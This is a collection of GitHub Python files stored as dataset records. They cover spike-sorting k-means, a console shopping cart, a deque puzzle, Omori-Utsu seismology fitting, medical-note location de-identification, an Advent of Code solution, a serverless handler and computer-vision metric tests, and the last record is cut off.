+{"seq_id":"42244718093","text":"\nimport numpy as np\nimport random as rand\nfrom matplotlib import pyplot as plt\nfrom peak_detect import detect_peaks\nfrom time import time\n\nfrom sklearn import metrics\nfrom sklearn.cluster import KMeans\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import scale\nfrom scipy.spatial import distance\nimport matplotlib as mpl\nfrom matplotlib.pyplot import cm \n\n\n#########################################################\n# The following code apply K-means algorithms to signal\n# by three steps: spike detection, alignment of spikes and k-means algorithm\n\n\n# Question 1: we have to manually set the window length/convolution window, \n# since we use convolution window to find spike, the convolution result may not give\n# us the best estimate\n\n# Question 2: local maximum determines our result in k means\n\n###########################################################################\n\n# process_spike function will detect spikes in input signal and align them :\n# input: \n# signal: the input signal\n# window_len: the manually set length for window in convolution\n# take_window_len: chop off length for spike\n# window_height: the manually set height for window in convolution\n# noise_level: the lower bound parameter in the find local maxima function\n\n# output: the aligned spikes in a 2-D array detected_spikes\n\ndef process_spike(signal, window_len, take_window_len,noise_level, window_height=2):\n\t\n\t################################################\n\t# Step 1: take the absolute value of signal\n\t\n\tsignal_abs=map(abs,signal)\n\t#signal_abs=np.array(signal)**2\n\t\n\t# Step 2: take convolution of the absolute value\n\tweights = np.repeat(window_height, window_len)\n\tconvolution=np.convolve(weights,signal_abs,'same')\n\tconvolution=convolution/window_len\n\n\tplt.plot(convolution)\n\tplt.show()\n\n\t# Step 3: find the indices of local maxima of the convolution\n\tlocal_max=detect_peaks(convolution, mph=noise_level*5, mpd=window_len,threshold=0, edge='rising',\n kpsh=False, valley=False, show=False)\n\n\t# Step 4: locate/save spike vectors\n\tm=len(local_max)\n\tn=take_window_len\n\tdetected_spikes=np.zeros((m,n))\n\tindex=0\n\tfor item in local_max:\n\t\tdetected_spikes[index]=signal[item-take_window_len/2:item+take_window_len/2]\n\t\tindex=index+1\n\tdetected_spikes1=detected_spikes.copy()\n\n\t#return detected_spikes\n\n\t# Step 5: align spikes \n\tk=rand.randint(0,m-1)\n\tmax_location=detected_spikes[k].argmax(axis=0)\n\tfor i in range(0,m-1):\n\t\tspike_max_location=detected_spikes[i].argmax(axis=0)\n\t\tdistance=max_location-spike_max_location\n\t\tdetected_spikes[i]=np.roll(detected_spikes[i],distance)\n\n\treturn detected_spikes\n\n\n\n#######################################################################\n# K_means_spikeDetection function will perform k-means algorithm on \n# aligned spikes\n\n\ndef k_means_spikeDetection(aligned_spikes,num_cluster,iterations=20):\n\t# Initialize spikes with lables\n\tm=aligned_spikes.shape[0]#num of points\n\tn=aligned_spikes.shape[1]#dim of the points\n\t\n\t# Take initialize centers\n\tk=np.random.permutation(m)\n\tinitial_center=np.zeros((num_cluster,n))\n\n\t#return initial_center\n\tfor num in range(num_cluster):\n\t\tinitial_center[num]=aligned_spikes[k[num]]\n\n\t# Main loop:\n\tcenter_vectors=initial_center\n\tfor ite in range(iterations):\n\t\t\n\t\t# Determine clusters by computing the Eculidean 
distance\n\t\tclusters_distance=distance.cdist(aligned_spikes,center_vectors,'euclidean',p=2)\n\t\tlabel=clusters_distance.argmin(axis=1)\n\t\t\n\t\tclassified_spikes=np.c_[aligned_spikes,label]\n\n\t\t# assign each vector in aligned_spikes a group\t\t\n\t\tfor index in range(0,num_cluster):\n\t\t\tcluster_vector=aligned_spikes[label==index]\n\t\t\tnumber=cluster_vector.shape[0]\n\n\t\t\t# Get new center by averaging vectors in a certain group\n\t\t\tcenter_vectors[index]=1.0/number*np.sum(cluster_vector,axis=0)\t\t\t\n\n\treturn center_vectors,label\n\n\ndef plot_kMeans_clusters(classified_spikes,center_vectors,num_cluster):\n\tcolor=cm.rainbow(np.linspace(0,1,num_cluster))\n\n\tfor i in range(num_cluster):\n\t\tplt.plot(center_vectors[i])\n\t\tplt.savefig('image/classifed_centers.png')\n\n\tfor index_i in range(0,num_cluster):\n\t\tcluster_vector=classified_spikes[classified_spikes[:,-1]==index_i]\n\t\tnumber=cluster_vector.shape[0]\n\n\t\tfor index_j in range(0,number):\n\t\t\t#plt.subplot(index)\n\t\t\tplt.plot(cluster_vector[index_j],color=color[index_i])\n\t\t\t#plt.show()\n\n\t\tplt.savefig('image/clusters.png')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"YueXX/spike-sorting-project","sub_path":"backup_code/k_means_Eculidean2Norm.py","file_name":"k_means_Eculidean2Norm.py","file_ext":"py","file_size_in_byte":4371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
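The assign/update loop above is standard Lloyd's iteration: label every point by its nearest center with cdist, then move each center to the mean of its cluster. A self-contained demo on synthetic 2-D data (empty-cluster handling is omitted, as in the original):

import numpy as np
from scipy.spatial import distance

rng = np.random.default_rng(0)
X = np.vstack([rng.normal(0, 1, (50, 2)), rng.normal(5, 1, (50, 2))])
centers = X[rng.permutation(len(X))[:2]].copy()  # random initial centers

for _ in range(20):
    labels = distance.cdist(X, centers).argmin(axis=1)  # assignment step
    for k in range(2):                                  # update step
        centers[k] = X[labels == k].mean(axis=0)

print(np.round(centers))  # roughly [[0. 0.], [5. 5.]]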
+{"seq_id":"21999113490","text":"goods = {1:'肥皂',2:'牙刷',3:'牙膏',4:'毛巾',5:'卫衣',6:'短袖',7:'长裤',8:'短裤',9:'饮料',10:'零食',11:'鞋子',12:'马自达',13:'劳斯莱斯'}\ngoodsKey = tuple(goods.keys())\ngoodsValue = list(goods.values())\nmoney = {1: 3, 2: 5, 3: 8, 4: 5, 5: 30, 6: 20, 7: 30, 8: 20, 9: 3, 10: 6, 11: 25,12:200000,13:5000000}\nface = {1:'购物',2:'结账',3:'查看余额',4:'购物清单',5:'充值'}\nshop = list()\ncash = 100\n\nfile = open('shopHistory.txt', 'w')\nfile.write('商品列表:')\nfile.write(\"\\n\")\nfor i in goodsValue:\n file.write(str(i))\n file.write(' ')\nfile.write(\"\\n\")\n\ndef Face():\n print(' ')\n print(face)\n print(' ')\n a = eval(input(\"请选择想要操作的数字:\"))\n if a == 1:\n Shop()\n elif a == 2:\n Pay()\n elif a == 3:\n print(' ')\n print(\"{}元\".format(cash))\n Face()\n elif a == 4:\n Remove()\n elif a == 5:\n Cash()\n else:\n print(' ')\n print(\"输入错误,请重新输入:\")\n Face()\n\ndef Shop():\n b = 1\n while b != 0:\n print(' ')\n print(goods)\n print(' ')\n b = eval(input(\"请选择你想购买的商品编号(0:退出):\"))\n shop.append(goodsKey[b-1])\n continue\n shop.pop(-1)\n Face()\n\ndef Pay():\n global cash\n pay = 0\n for m in shop:\n pay = pay + money[m]\n print(' ')\n p = eval(input(\"{}元,是否支付(1:支付,2:返回)\".format(pay)))\n if p == 1:\n if pay < cash:\n file.write('购买商品:')\n file.write(\"\\n\")\n for i in shop:\n file.write((goods[i]))\n file.write(' ')\n file.write(\"\\n\")\n print(' ')\n pa = eval(input(\"支付成功!是否退出(1:退出,2:返回界面)\"))\n cash = cash - pay\n if pa == 1:\n print(' ')\n print(\"祝您生活愉快!\")\n elif pa == 2:\n shop.clear()\n Face()\n else:\n print(' ')\n print(\"输入失败,请重新输入\")\n Pay()\n elif pay >= cash:\n print(' ')\n print(\"余额不足,请充值\")\n Face()\n elif p == 2:\n Face()\n else:\n print(' ')\n print(\"输入错误,请重新输入:\")\n Pay()\n\ndef Cash():\n print(' ')\n c = eval(input(\"请输入充值金额:\"))\n global cash\n cash = cash + c\n print(' ')\n print(\"充值成功!\")\n Face()\n\ndef Remove():\n for i in shop:\n print(goods[i])\n print(' ')\n s = eval(input(\"是否删除商品:(1:是,2:否):\"))\n if s == 1:\n print(' ')\n ss = eval(input(\"请输入想要删除的商品编号:(0:退出)\"))\n try:\n shop.remove(ss)\n except:\n print(' ')\n print(\"该商品不在购物车中\")\n Remove()\n print(' ')\n print(\"删除成功!\")\n Face()\n elif s == 2:\n Face()\n else:\n print(' ')\n print(\"输入错误,请重新输入:\")\n Remove()\ndef main():\n print(' ')\n print(\"《购物车》\")\n Face()\n file.close()\n\nmain()","repo_name":"Dzy0121/Gitspace","sub_path":"shopping.py","file_name":"shopping.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"3399076289","text":"# 1835] 카드\n\nfrom collections import deque\nn = int(input())\ndq=deque()\nfor i in range(n,0,-1):\n dq.appendleft(i)\n # dq.rotate()\n for _ in range(i):\n dq.appendleft(dq.pop())\n \nprint(*dq)\n","repo_name":"devryyeong/problem-solving","sub_path":"BOJ/1835.py","file_name":"1835.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"23484749458","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef GraphOmoriUtsu(df, gap, calcul_OU, ms_max_mag, foreshock):\n\n \"\"\"\n Fonction qui crée un graphe Omori-Utsu et calcule les K- & p-values\n :param df: données (table pandas)\n :param gap: taille des bars d'histograme (en s)\n :param calcul_OU: calcule de la loi OU (1) ou non (0)\n :param ms_max_mag: 1 = le jour du main shock est considéré comme celui ayant la plus grande magnitude max\n 0 = le jour du main shock est considéré comme celui ayant le plus grand nombre de séisme\n :param foreshock: 1 = analyse des précurseurs\n 0 = analyse des répliques\n :return: objet graphe qui trace le nombre de séisme par jour (ligne) et la magnitude max par jour (point)\n Le titre est constitué de la localisation (jour) du main shock ainsi que des K- et p-values calculées\n \"\"\"\n\n nb_gap = int((df['sec'].max() - df['sec'].min()) // gap)\n nt = []\n magmax = []\n title = 'Earthquake number and maximal magnitude per day'\n\n for i in range(nb_gap + 1):\n dfbis = df[((i * gap + df['sec'].min()) <= df['sec']) & (((i + 1) * gap + df['sec'].min()) > df['sec'])]\n nt.append(len(dfbis))\n magmax.append(dfbis['mag'].max())\n\n fig, ax1 = plt.subplots()\n x = [i for i in range(nb_gap + 1)]\n # Ordonnée de gauche : # séismes / jour\n color = 'tab:blue'\n ax1.set_xlabel('time (day)')\n ax1.set_ylabel('Earthquake # per day', color=color)\n y = nt\n ax1.plot(x, y, color=color)\n ax1.tick_params(axis='y', labelcolor=color)\n # Ordonnée de droite : magnitude max / jour\n ax2 = ax1.twinx()\n color = 'tab:red'\n ax2.set_ylabel('Max magnitude per day', color=color)\n ax2.scatter(x, magmax, s=10, color=color)\n ax2.tick_params(axis='y', labelcolor=color)\n\n if calcul_OU == 1:\n if foreshock == 1:\n a, b, idx_ms = RegressionOU_foreshock(1, nt, ms_max_mag, magmax)\n study = 'foreshocks'\n else:\n a, b, idx_ms = RegressionOU(1, nt, ms_max_mag, magmax)\n study = 'aftershocks'\n\n title = 'Main shock at ' + str(idx_ms) + ' days / p-value (' + study + ') = ' + str(round(-a, 2)) + \\\n ' / K-value = ' + str(round(10 ** b))\n\n ax1.set_title(title)\n fig.tight_layout()\n plt.show()\n\n if calcul_OU == 1:\n return a, b, idx_ms\n\n \ndef RegressionOU(c, nt, ms_max_mag, magmax):\n\n \"\"\"\n Fonction qui calcule les coefficients de la régression de la loi OU à partir des répliques\n :param c: c-value\n :param nt: liste des nombres de séisme par jour\n :param ms_max_mag: 1 = le jour du main shock est considéré comme celui ayant la plus grande magnitude max\n 0 = le jour du main shock est considéré comme celui ayant le plus grand nombre de séisme\n :param magmax: liste des magnitudes max par jour\n :return: les 2 coefficients de la régression et la localisation (jour) du main shock\n \"\"\"\n\n # Définition de main shock ?\n # 1) la magnitude la plus élevée\n if ms_max_mag == 1:\n idx_ms = magmax.index(max(magmax))\n # 2) Le nombre de séisme le plus élevé\n else:\n idx_ms = nt.index(max(nt))\n\n t = [(idx_ms + i) for i in range(len(nt) - idx_ms)]\n x = []\n y = []\n for i in range(len(nt) - idx_ms):\n if nt[i + idx_ms] != 0:\n y.append(np.log10(nt[i + idx_ms]))\n x.append(np.log10(c + t[i]))\n [a, b] = np.polyfit(x, y, 1)\n\n return a, b, idx_ms\n\n\ndef RegressionOU_foreshock(c, nt, ms_max_mag, magmax):\n \"\"\"\n Fonction qui calcule les coefficients de la régression de la loi OU à partir des précurseurs\n :param c: c-value\n :param nt: liste des nombres de séisme par jour\n :param ms_max_mag: 1 = le jour du main 
shock est considéré comme celui ayant la plus grande magnitude max\n 0 = le jour du main shock est considéré comme celui ayant le plus grand nombre de séisme\n :param magmax: liste des magnitudes max par jour\n :return: les 2 coefficients de la régression et la localisation (jour) du main shock\n \"\"\"\n\n # Définition de main shock ?\n # 1) la magnitude la plus élevée\n if ms_max_mag == 1:\n idx_ms = magmax.index(max(magmax))\n # 2) Le nombre de séisme le plus élevé\n else:\n idx_ms = nt.index(max(nt))\n\n x = []\n y = []\n for i in range(idx_ms):\n if nt[i] != 0:\n y.append(np.log10(nt[i]))\n x.append(np.log10(c + i))\n [a, b] = np.polyfit(x, y, 1)\n\n return a, b, idx_ms\n\n \nif __name__ == '__main__':\n\n df = pd.read_csv('../data_SNat/CDSA_SeulementEssaimSaintes_2004-2005.txt', sep=\"\\s+\")\n\n # 1 jour = 86 400 sec\n gap = 3600 * 24\n # Calcul de p et K\n GraphOmoriUtsu(df, gap, 1, 1, 0)","repo_name":"Skaddd/GeoScience","sub_path":"Codes_Graphes/OmoriUtsu.py","file_name":"OmoriUtsu.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
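RegressionOU fits the Omori-Utsu law n(t) = K / (c + t)^p in log-log space: log10 n = log10 K - p * log10(c + t), so np.polyfit returns slope a = -p and intercept b = log10 K (hence p = -a and K = 10**b in the plot title). A sanity check on noiseless synthetic counts recovers both parameters:

import numpy as np

K, p, c = 120.0, 1.1, 1.0
t = np.arange(0, 30)            # days since the main shock
n = K / (c + t) ** p            # idealized daily aftershock counts

a, b = np.polyfit(np.log10(c + t), np.log10(n), 1)
print(-a, 10 ** b)              # ~1.1 and ~120.0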
+{"seq_id":"5302017354","text":"import re\nimport sys\nimport locationtagger\nfrom nltk.tag import pos_tag\n\n\"\"\"\nFrank Chien\nAssignment 8 - de-identification\n10/15/21\n\nThis script adapts the phone tagger patient information de-identification algorithm.\nThe chosen category for this assignment is 'locations'.\nIn the deid_phone function, instead of calling check_for_phone this script will call check_for_location\nThe check_for_location function represents my work.\n\nInstead of the approach used in the PELR script, this assignment uses a natural language processing approach.\nThe strategy for location PHI identification is as follows\n!) use location tagger to identify locations\n2) use nltk part of speech tagging to identify proper nouns\n3) The intersect of locations and proper nouns are flagged as location PHI\n\nThe reason why proper nouns were used as a requirement is because the words such as \"home\" or \"hospital\" would\nrepresent (and correctly be tagged) as locations. However, do not offer identifiable patient information.\nLocations such as \"Calvert\" or \"Boston\" for instance would be identifiable information and are proper nouns.\n\nOne difficulty this strategy encountered was the sensitivity and specificity of the strategy relies on the performance\nof both the location tagger and the part of speech tagger. Since the input was medical documentation, which includes\nspecific language, syntax, sympbols, and abbreviations which are not seen in other domains of common English,the\nnatural language processing components had difficulty. For example, \"Aline\" was frequently tagged as a location, whereas\nphysicians/nurses would understand 'aline' as an arterial line, a piece of medical equipment. Another example is that\nsome notes were written in all-caps. The NLTK POS tagger relies on caplitalization to identify proper nouns, thus\nfor these notes, many tokens were incorrectly tagged as as 'NNP', or proper noun.\n\nIn summary, using a natural language processing approach to medical note deindification is a challenge due to the difficulty in parsing medical language with NLP tools,\nwhich can be very different syntactically and in lexicon from common English.\n\nUnfortunately, the performance of this NLP strategy as implemented is poor. Though the algorithm detected some locations correctly\n(56 true positives), the number of false positives and false negatives were great (816, and 311, respectively). A large number of\ntokens were incorrectly identified as a location (such as \"aline\") and further, incorrectly tagged as proper nouns.\nThis exercise has been a demonstration of both how medical record de-identification works, but also of the difficulty in\nanalyzing medical texts as natrual language.\n \nThe location tagger was obtained at\nhttps://pypi.org/project/locationtagger/\n\"pip install location tagger\" was run on terminal to install the location tagger\nFollowing the instructions from the website, the command \"python -m spacy download en\" was required.\nThe location tagger is maintained by kaushiksoni10 and has an open source license\nPer webiste, \"OSI approved::MIT license\"\n\nPart of speech tagging was achieved throught he NLTK tagger pos_tag. 
\n\n\"\"\"\n\ndef check_for_phone(patient,note,chunk, output_handle):\n #ths is the original code written by Clifford Lab\n \"\"\"\n Inputs:\n - patient: Patient Number, will be printed in each occurance of personal information found\n - note: Note Number, will be printed in each occurance of personal information found\n - chunk: one whole record of a patient\n - output_handle: an opened file handle. The results will be written to this file.\n to avoid the time intensive operation of opening and closing the file multiple times\n during the de-identification process, the file is opened beforehand and the handle is passed\n to this function. \n Logic:\n Search the entire chunk for phone number occurances. Find the location of these occurances \n relative to the start of the chunk, and output these to the output_handle file. \n If there are no occurances, only output Patient X Note Y (X and Y are passed in as inputs) in one line.\n Use the precompiled regular expression to find phones.\n \"\"\"\n # The perl code handles texts a bit differently, \n # we found that adding this offset to start and end positions would produce the same results\n offset = 27\n\n # For each new note, the first line should be Patient X Note Y and then all the personal information positions\n output_handle.write('Patient {}\\tNote {}\\n'.format(patient,note))\n\n # search the whole chunk, and find every position that matches the regular expression\n # for each one write the results: \"Start Start END\"\n # Also for debugging purposes display on the screen (and don't write to file) \n # the start, end and the actual personal information that we found\n\n\n for match in ph_reg.finditer(chunk):\n \n # debug print, 'end=\" \"' stops print() from adding a new line\n print(patient, note,end=' ')\n print((match.start()-offset),match.end()-offset, match.group())\n \n # create the string that we want to write to file ('start start end') \n result = str(match.start()-offset) + ' ' + str(match.start()-offset) +' '+ str(match.end()-offset) \n \n # write the result to one line of output\n output_handle.write(result+'\\n')\n\n\ndef check_for_location(patient,note,chunk, output_handle):\n #this is the function wrote by Frank Chien for the assignment\n #please see comment above for description of the strategy\n\n offset = 27 #identified offset required by clifford lab\n output_handle.write('Patient {}\\tNote {}\\n'.format(patient,note))\n #print(patient, note) #allows us to see how many notes the algorithm has worked through\n \n #using the location tagger \n locations = locationtagger.find_locations(text = chunk) #locationtagger returns a location object\n all_locations = locations.countries + locations.regions + locations.cities #location objects stores locations in 3 places, as countries, locations, and cities\n \n #using the NLTK part of speech tagger\n tagged_chunk = pos_tag(chunk.split()) #first split into tokens, then tag\n\n for location in all_locations: #iterates through identified locations\n for token_pos in tagged_chunk: #looks for location in list of tagged tokens. 
token_pos is a tuple: (token, part of speech tag)\n if location.lower() == token_pos[0].lower(): #to match location to token, only lower cases are used\n if token_pos[1]=='NNP': #if the token is a proper noun, we have identified a possible location PHI\n substring=token_pos[0] \n indices=[_.start() for _ in re.finditer(substring,chunk)] #uses a regex to identify all instances of the location within the chunk\n for start_pos in indices: #composes the result line to be written to the output file\n start_pos = start_pos - offset \n end_pos = start_pos + len(substring)\n result = str(start_pos) + ' ' + str(start_pos) + ' '+ str(end_pos)\n\n output_handle.write(result+'\\n') #writes result to output file\n\n break #break the loop and check for the next location token. The regex iterator will already obtain all instances of the location in the chunk.\n \n \n \ndef deid_phone(text_path= 'id.text', output_path = 'phone.phi'):\n \n \"\"\"\n Inputs: \n - text_path: path to the file containing patient records\n - output_path: path to the output file.\n \n Outputs:\n for each patient note, the output file will start by a line declaring the note in the format of:\n Patient X Note Y\n then for each phone number found, it will have another line in the format of:\n start start end\n where the start is the start position of the detected phone number string, and end is the detected\n end position of the string both relative to the start of the patient note.\n If there is no phone number detected in the patient note, only the first line (Patient X Note Y) is printed\n to the output\n Screen Display:\n For each phone number detected, the following information will be displayed on the screen for debugging purposes \n (these will not be written to the output file):\n start end phone_number\n where `start` is the start position of the detected phone number string, and `end` is the detected end position of the string\n both relative to the start of patient note.\n \n \"\"\"\n # start of each note has the patter: START_OF_RECORD=PATIENT||||NOTE||||\n # where PATIENT is the patient number and NOTE is the note number.\n start_of_record_pattern = '^start_of_record=(\\d+)\\|\\|\\|\\|(\\d+)\\|\\|\\|\\|$'\n\n # end of each note has the patter: ||||END_OF_RECORD\n end_of_record_pattern = '\\|\\|\\|\\|END_OF_RECORD$'\n\n # open the output file just once to save time on the time intensive IO\n with open(output_path,'w+') as output_file:\n with open(text_path) as text:\n # initilize an empty chunk. 
Go through the input file line by line\n # whenever we see the start_of_record pattern, note patient and note numbers and start \n # adding everything to the 'chunk' until we see the end_of_record.\n chunk = ''\n #remove later\n # counter=0\n for line in text:\n record_start = re.findall(start_of_record_pattern,line,flags=re.IGNORECASE)\n if len(record_start):\n patient, note = record_start[0]\n chunk += line\n\n # check to see if we have seen the end of one note\n record_end = re.findall(end_of_record_pattern, line,flags=re.IGNORECASE)\n\n if len(record_end):\n # Now we have a full patient note stored in `chunk`, along with patient numerb and note number\n # pass all to check_for_phone to find any phone numbers in note.\n\n #check_for_phone(patient,note,chunk.strip(), output_file)\n check_for_location(patient, note, chunk.strip(), output_file)\n # counter+=1\n # if(counter>0):\n # break\n\n #this the one we need to modify above - \n \n # initialize the chunk for the next note to be read\n chunk = ''\n\n \nif __name__== \"__main__\":\n print(sys.prefix)\n deid_phone(sys.argv[1], sys.argv[2])\n \n","repo_name":"thisishcb/BMI500_HW8_Deid_Date","sub_path":"python/deid-FrankChien.py","file_name":"deid-FrankChien.py","file_ext":"py","file_size_in_byte":10776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"}
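The span bookkeeping in check_for_location, which locates every occurrence of a flagged token with re.finditer and emits offset-adjusted "start start end" triples, can be exercised in isolation. This sketch reuses the 27-character offset convention from the script; re.escape is added so tokens containing regex metacharacters stay literal:

import re

OFFSET = 27  # same header offset the script applies

def phi_spans(chunk, token):
    """Yield (start, start, end) for each occurrence of a flagged token."""
    for m in re.finditer(re.escape(token), chunk):
        start = m.start() - OFFSET
        yield start, start, start + len(token)

chunk = "x" * 27 + "Seen at Boston General; transferred to Boston."
print(list(phi_spans(chunk, "Boston")))  # [(8, 8, 14), (39, 39, 45)]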
+{"seq_id":"22077981767","text":"def read_data(data_path):\n \"\"\"\n Reads data\n \"\"\"\n heightmap = []\n f = open(data_path, \"r\")\n for x in f:\n heightmap.append([int(h) for h in x.strip()])\n return heightmap\n\n\ndef is_lowest(heightmap, i, j):\n \"\"\"\n Searches for lowest poi nt\n \"\"\"\n height = heightmap[i][j]\n if (j > 0) and (heightmap[i][j - 1] <= height):\n return False\n if (j < len(heightmap[i]) - 1) and (heightmap[i][j + 1] <= height):\n return False\n if (i > 0) and (heightmap[i - 1][j] <= height):\n return False\n if (i < len(heightmap) - 1) and (heightmap[i + 1][j] <= height):\n return False\n return True\n\n\ndef basin_size(hmap, i, j):\n \"\"\"\n Calculates basin size\n \"\"\"\n\n # Initialize sets and add first point\n basin = set()\n current = set()\n basin.add((i, j))\n current.add((i, j))\n new = current\n\n # Do while there are new points\n while len(new) > 0:\n new = set()\n # Look around the points in new and add them to basin and new\n for point in current:\n for [x, y] in [[1, 0], [0, 1], [-1, 0], [0, -1]]:\n if point[0] + y >= 0 and point[1] + x >= 0:\n if point[0] + y < len(hmap):\n if point[1] + x < len(hmap[point[0] + y]):\n if hmap[point[0] + y][point[1] + x] < 9:\n point_new = (point[0] + y, point[1] + x)\n if point_new not in basin:\n basin.add(point_new)\n new.add(point_new)\n # Update sets\n current = new\n return len(basin)\n\n\nif __name__ == \"__main__\":\n\n # Read data\n data_path = \"input\"\n heightmap = read_data(data_path)\n\n # Basin evaluation\n risk = 0\n basins = []\n\n for i in range(len(heightmap)):\n for j in range(len(heightmap[i])):\n if is_lowest(heightmap, i, j):\n risk += heightmap[i][j] + 1\n basins.append(basin_size(heightmap, i, j))\n\n print(f\"Total risk is {risk}\")\n basins.sort()\n print(f\"Multiplied sizes {basins[-1] * basins[-2] * basins[-3]}\")\n","repo_name":"jakuberan/AoC-2021","sub_path":"day_09/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"73640380524","text":"import json\nfrom functions.validate import validate_event\n\ndef validate(event, context):\n print(\"heres an event\", event)\n print(\"heres the context\", context.__dict__)\n response = validate_event(event, context)\n return response\n\ndef process(event, context):\n print(\"heres an event\", event)\n print(\"heres the context\", context.__dict__)\n return {\n \"body\": \"been processed ty\"\n }\n\ndef hello(event, context):\n body = {\n \"message\": \"Go Serverless v1.0! Your function executed successfully!\",\n \"input\": event\n }\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(body)\n }\n\n return response\n\n # Use this code if you don't use the http event with the LAMBDA-PROXY\n # integration\n \"\"\"\n return {\n \"message\": \"Go Serverless v1.0! Your function executed successfully!\",\n \"event\": event\n }\n \"\"\"\n","repo_name":"Mac-lp3/stepy","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"17299939043","text":"from hamcrest import assert_that, close_to, has_items, has_length\nfrom numpy import nanmean\n\nfrom deepchecks.vision import VisionData\nfrom deepchecks.vision.metrics_utils.detection_precision_recall import ObjectDetectionAveragePrecision\nfrom deepchecks.vision.metrics_utils.scorers import calculate_metrics\nfrom deepchecks.vision.metrics_utils.semantic_segmentation_metrics import MeanDice, MeanIoU, per_sample_dice\n\n\ndef test_default_ap_ignite_complient(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'AveragePrecision': ObjectDetectionAveragePrecision()},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n assert_that(res.keys(), has_length(1))\n assert_that(res['AveragePrecision'], has_length(80))\n\n\ndef test_ar_ignite_complient(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'AverageRecall': ObjectDetectionAveragePrecision(return_option='ar')},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n\n assert_that(res.keys(), has_length(1))\n assert_that(res['AverageRecall'], has_length(80))\n\n\ndef test_equal_pycocotools(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n metric = ObjectDetectionAveragePrecision(return_option=None)\n for batch in coco_test_visiondata:\n label = coco_test_visiondata.batch_to_labels(batch)\n prediction = coco_test_visiondata.infer_on_batch(batch, mock_trained_yolov5_object_detection, device)\n metric.update((prediction, label))\n res = metric.compute()[0]\n\n assert_that(metric.get_classes_scores_at(res['precision'], area='all', max_dets=100), close_to(0.409, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], iou=0.5, area='all', max_dets=100),\n close_to(0.566, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], iou=0.75, area='all', max_dets=100),\n close_to(0.425, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], area='small', max_dets=100), close_to(0.212, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], area='medium', max_dets=100), close_to(0.383, 0.001))\n assert_that(metric.get_classes_scores_at(res['precision'], area='large', max_dets=100), close_to(0.541, 0.001))\n\n assert_that(metric.get_classes_scores_at(res['recall'], area='all', max_dets=1), close_to(0.330, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='all', max_dets=10), close_to(0.423, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='all', max_dets=100), close_to(0.429, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='small', max_dets=100), close_to(0.220, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='medium', max_dets=100), close_to(0.423, 0.001))\n assert_that(metric.get_classes_scores_at(res['recall'], area='large', max_dets=100), close_to(0.549, 0.001))\n\n # unrelated to pycoco but needed to check another param\n assert_that(metric.get_classes_scores_at(res['recall'], area='large', max_dets=100, get_mean_val=False,\n zeroed_negative=False), has_items([-1]))\n assert_that(metric.get_classes_scores_at(res['recall'], get_mean_val=False, zeroed_negative=False), has_items([-1]))\n\n\ndef test_average_precision_recall(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'ap': ObjectDetectionAveragePrecision(),\n 'ap_macro': 
ObjectDetectionAveragePrecision(average='macro'),\n 'ap_weighted': ObjectDetectionAveragePrecision(average='weighted')},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n # classes mean and macro are not equal due to zeroed negative\n assert_that(nanmean(res['ap']), close_to(0.396, 0.001))\n assert_that(res['ap_macro'], close_to(0.409, 0.001))\n assert_that(res['ap_weighted'], close_to(0.441, 0.001))\n\n\ndef test_average_precision_thresholds(coco_test_visiondata: VisionData, mock_trained_yolov5_object_detection, device):\n res = calculate_metrics({'ap': ObjectDetectionAveragePrecision(iou_range=(0.4, 0.8, 5), average='macro')},\n coco_test_visiondata, mock_trained_yolov5_object_detection,\n device=device)\n assert_that(res['ap'], close_to(0.514, 0.001))\n\n\ndef test_segmentation_metrics(segmentation_coco_train_visiondata, trained_segmentation_deeplabv3_mobilenet_model,\n device):\n dice_per_class = MeanDice()\n dice_micro = MeanDice(average='micro')\n dice_macro = MeanDice(average='macro')\n iou_per_class = MeanIoU()\n iou_micro = MeanIoU(average='micro')\n iou_macro = MeanIoU(average='macro')\n\n for batch in segmentation_coco_train_visiondata:\n label = segmentation_coco_train_visiondata.batch_to_labels(batch)\n prediction = segmentation_coco_train_visiondata.infer_on_batch(\n batch, trained_segmentation_deeplabv3_mobilenet_model, device)\n dice_per_class.update((prediction, label))\n dice_micro.update((prediction, label))\n dice_macro.update((prediction, label))\n iou_per_class.update((prediction, label))\n iou_micro.update((prediction, label))\n iou_macro.update((prediction, label))\n assert_that(dice_per_class.compute()[0], close_to(0.973, 0.001))\n assert_that(dice_per_class.compute(), has_length(17))\n assert_that(dice_micro.compute(), close_to(0.951, 0.001))\n assert_that(dice_macro.compute(), close_to(0.649, 0.006))\n assert_that(iou_per_class.compute()[0], close_to(0.948, 0.001))\n\n\ndef 